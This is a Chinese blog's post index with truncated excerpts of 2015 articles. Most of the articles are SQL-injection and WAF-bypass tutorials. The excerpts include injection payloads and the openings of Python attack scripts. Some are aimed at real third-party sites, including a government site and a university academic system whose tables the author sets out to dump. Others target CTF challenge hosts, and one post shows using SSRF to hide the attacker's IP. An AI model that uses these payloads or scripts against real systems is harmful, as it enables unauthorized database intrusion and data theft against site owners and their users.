- 博客(14)
- 资源 (22)
- 收藏
- 关注
RSS订阅原创 简单的方式挖掘和利用soap的sql注入
1.首先soap是什么:对于应用程序开发来说,使程序之间进行因特网通信是很重要的。目前的应用程序通过使用远程过程调用(RPC)在诸如 DCOM 与 CORBA 等对象之间进行通信,但是 HTTP 不是为此设计的。RPC 会产生兼容性以及安全问题;防火墙和代理服务器通常会阻止此类流量。通过 HTTP 在应用程序间通信是更好的方法,因为 HTTP 得到了所有的因特网浏览器及服务器的支持。SOAP
2015-10-29 15:03:27
15350
3
原创 利用ssrf 掩盖自己的ip地址,从而攻击其他网站
如果直接访问 http://www.ip.cn/ 就可以知道自己的ip地址,这样直接攻击网站就会暴露自己,但是,如果用ssrf这个漏洞,就可以用远程的服务器做代理去攻击其他网站例子:如果你这样访问http://qjjz.net/newsweb/news.shtml?url=http://www.ip.cn查看源代码,你会发现你的ip变成了,当前 IP:124.40.116.2
2015-10-29 14:09:31
1679
原创 洋洋洒洒c作业
1.定义一长度为20的整型数组,然后利用循环从键盘向数组输入15个数据(无序)(1)写一个函数void Insert(int *arr,int i,int x);参数说明:arr 数组指针i i>0 && ix 待插入数据元素函数功能:在第i个数据元素之前插入数据x(2)写一个函数void Delete(int *arr,int i);参数说明:arr
2015-10-25 00:51:39
677
原创 debug.exe 指令
r命令:查看,改变cpu寄存器的内容d命令:查看内存中的内容e命令:改写内存中的内容u命令:命令将内存中的机器指令翻译成汇编指令t命令:执行一条机器指令a命令:以汇编的指令的格式在内存中写入一条机器指令r cpu当前寄存器的内容r ax 改变ax寄存器的内容r cs 改变当前cpu段寄存器的值r ip 改变偏
2015-10-23 15:52:58
2863
3
原创 mysql利用双重url编码绕过防火墙
例子:http://www.gzidc.org/search/post 的数据:keyword=a如果单纯的在搜索框中输入:select , union,detele,' 那么就会被waf阻拦页面会显示:非法字符如果用双重编码的url替换注入语句那么,waf就不会拦截下面我写了一个程序来讲普通的注入语句转换为双重url编码:import stri
2015-10-17 00:25:27
2005
1
原创 mysql利用颜表情绕过waf注入
如今连sql注入都开始卖萌了 例子:http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/?lalala=1我们用普通的方式去尝试注入:(1)http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/?lalala=1 and 1=1 #页面显示:Undeclar
2015-10-15 17:01:31
2364
原创 内蒙古大学教务处脱表名脚本
# -*- coding: gbk -*-import urllib2for icounti in range(1000): myhehedata="tbl=dual/**/where/**/1=ctxsys.drithsx.sn(1,(SELECT/**/table_name FROM(SELECT/**/user_tables.table_name,ROWNUM/**/AS/**/
2015-10-14 19:29:54
1427
1
原创 mysql宽字符注入
先补充一点背景:大 家都知道PHP在开启magic_quotes_gpc或者使用addslashes、iconv等函数的时候,单引号(')会被转义成\'。比如字 符%bf在满足上述条件的情况下会变成%bf\'。其中反斜杠(\)的十六进制编码是%5C,单引号(')的十六进制编码是%27,那么就可以得出%bf \'=%bf%5c%27。如果程序的默认字符集是GBK等宽字节字符集,则MySQL会认为
2015-10-14 00:27:19
2455
原创 http://web1.sycsec.com/b33804a7301e583ca6a473c1c092b09f/
# -*- coding: utf-8 -*-import stringimport urllib2import urllibapt=string.printable[:-6]def httpsend(baopo): data={} baopofirst="SYC" data[baopofirst+baopo]="1" url="http://web1.s
2015-10-13 02:46:52
6864
原创 mssql手工注入
报错注入:例子:www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1【1】首先爆版本:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and @@version>0报错信息:在将 nvarchar 值 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1
2015-10-11 22:52:49
14849
3
原创 python ip反查域名
__author__ = 'niexinming'# -*- coding: utf-8 -*-import osfor i in range(0,255): comm="nslookup 10.1.89."+str(i) resul= os.popen(comm) resulstr=resul.read() if resulstr.find('NXDOMAI
2015-10-10 23:39:18
4444
1
原创 oracle手注
报错注入:【1】爆版本号方法一:例子:http://210.35.35.70:82/Book.aspx?id=0199332841爆版本号:http://210.35.35.70:82/Book.aspx?id=0199332841' || utl_inaddr.get_host_name((select banner from v$version where rownum=1))
2015-10-09 01:12:06
2397
原创 python mysql盲注小程序
# -*- coding: gbk -*-import urllib2import urllibsqlcomm="(SELECT SCHEMA_NAME FROM information_schema.SCHEMATA limit 1,1)"data = { "admin":"admin' and (ascii(substring(version(),1,1))=0)
2015-10-07 20:16:15
2184
原创 python get和post请求
# -*- coding: utf-8 -*- #这个可以允许代码中包含中文字符import urllib2import urllibdata = { "admin":"admin' and (ascii(substring(version(),1,1))<0) #", "pass":"f", "action":"login"}
2015-10-06 13:09:27
1214
2019年11月最新nessus插件更新包.zip
2019-11-22
python动态代码审计
2018-08-30
2016 SWPU CTF web4
2016-10-31
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人